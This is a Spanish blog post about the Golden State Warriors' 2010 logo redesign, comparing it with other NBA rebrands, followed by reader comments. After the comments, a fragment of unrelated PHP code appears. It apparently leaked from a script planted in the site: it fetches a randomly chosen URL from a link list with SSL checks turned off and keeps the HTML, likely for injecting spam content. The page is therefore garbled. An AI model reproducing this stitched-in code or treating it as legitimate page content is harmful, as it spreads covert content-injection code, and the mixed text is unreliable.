Under the Bridge

01 de July de 2010 por Faju

Los Pistons tomaron la iniciativa en 2005 cambiando el atractivo logo del caballo negro por un rediseño mucho más personal y similar al utilizado desde su fundación hasta el 1996.

En la temporada 2006/07 los Bucks dieron el carpetazo definitivo al púrpura y verde utilizado entre el 1993 y el 2006, los tiempo de su particularBig Three (Robinson-Allen-Cassell). La franquicia encontró en Michael Redd al nuevo jugador franquicia y recuperó los colores verde y rojo con los que en 1971 consiguió su único anillo de la mano de Kareem Abdul-Jabbar y Oscar “The Big O” Robertson.

El año pasado fueron los Sixers los que abandonaban el logo dorado y recuperaban su mejor cara, la que los llevó a sus 3 campeonatos luciendo el rojo, azul y blanco.

Este 2010 otro equipo presenta el trabajo creativo de 18 meses en forma de nuevo logotipo, los Golden State Warriors. La nueva imagen es una reedición del famoso “The City” enarbolado a principios de los 70 por los San Francisco Warriors.

El nuevo logo presenta la silueta del mítico Golden Gate en amarillo cálido sobre un círculo azul intenso, los colores que les acompañaron durante casi treinta años.

Evolución logo Warriors

Tipográficamente los Warriors se han decantado por una fuente “genuinamente americana”. La aplicación de la Cooperplate Gothic alrededor del imagotipo recuerda al antiguo logotipo, pero esta vez, con una composición mucho más cuidada.

Cabe destacar los “alternate logos”, las aplicaciones/variaciones de la marca original que en la NBA tienen tanta salida. Para los que relacionaban el logo con la forma del estado (imagen utilizada entre el 1971 y el 1997) la nueva imagen también tiene una aplicación similar. Esta vez la silueta de California va acompañada de una “W” con los clásicos ribetes utilizados en casi todos los logotipos de la liga.

Logos Secundarios

También hay una aplicación con la forma de un balón, las iniciales “SF” y  la leyenda “EST. 1962” que recuerda a todo el mundo que ya son todos unos veteranos.


Hoy, la detallada figura del guerrero agarrando el rayo, los uniformes naranja y negro, o el “We believe” en los playoff del 2007, son ya parte de la historia de esta mítica franquicia que ha vivido en tres ciudades y dos conferencias.

Ahora, con la sexta elección del draft invertida en el ala-pívot Ekpe Udoh y después de una temporada en la que han sido el segundo mejor equipo en estadísticas ofensivas y el peor en defensiva, les toca rememorar sus mejores tiempos, de la mano de una joven plantilla y unos viejos colores.

Comenta

7 comentarios a esta entrada

  1. Txusma dice:
    #1

    Pues me encanta este nuevo logo de los Warriors… Nadie se va de viaje a New York en los próximos días? 😀

      Citar

  2. Óscar dice:
    #2

    Cuando los equipos empezaron a cambiar en los ’90 de logo o colores (sobre todo Sixers y Pistons, pero también aquel emblema de los Spurs multicolor , qué horror…) se perdió algo de sabor, de autenticidad.
    Pero han ido rectificando, afortunadamente. A mí que no me toquen los colores de los Blazers, ese rojo, blanco negro y plata… Si me hice de Portland desde pequeñito fue precisamente por el uniforme y el logo, igual que en fútbol con el Ajax o el Sao Paulo.
    Muy chulo este de los Warriors… Por cierto, una de las camisetas que repite mucho el Loncar es esa precisamente amarilla de la “City” con el Golden Gate. Pero ese tono de azul no me gusta tanto, aunque recuerde a los tiempos de Hardaway, Richmond o Mullin, y también al gran Manute Bol, que se murió hace unos días.

      Citar

  3. TheDeerHunter dice:
    #3

    yo sí soy de lo de remodelar logos y diseños… no tanto colores aunque en varios casos también lo he considerado un acierto

    en el caso de los warriors hemos visto diseños y vestuarios realmente feos… pero con el guerrero y con el vestuario del we believe creo que estaban perfectamente servidos por cierto tiempo

    en cualquier caso, me gustan mucho estos dos nuevos diseños… más el del puente que el de “california”. Yo hubiera añadido al 2º logo un balón en tercer plano y esta vez de menor tamaño que la silueta del estado. Creo que hubiera quedado muy bien y hubiera sido más auténtico.

      Citar

  4. Love Denise dice:
    #4

    No!!!, uno de los mejores logos de la NBA al garete, con lo bien que estaba el guerrero, pues ya de camino, que le pongan de nombre Golden state Bridge. otra cagada mas para esta franquicia.

      Citar

  5. Txusma dice:
    #5

    Pues a mí me gusta más este nuevo logo que el guerrero. La época de super hombres musculosos en plan cómic en el que se insipira el anterior diseño creo que ya pasó y esta propuesta me parece mucho más “eterna”. Vamos que no sigue las modas y puede mantenerse en el tiempo.

      Citar

  6. Marta dice:
    #6

    Todos los medios visuales tienen su recuerdo en sus inicios. Personalmente creo que se debe renovar a partir de la esencia de la casa y de la originalidad de la misma.

      Citar

  7. aro_pasado_no_newtoniano dice:
    #7

    ¿lo cambían por mal fario?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>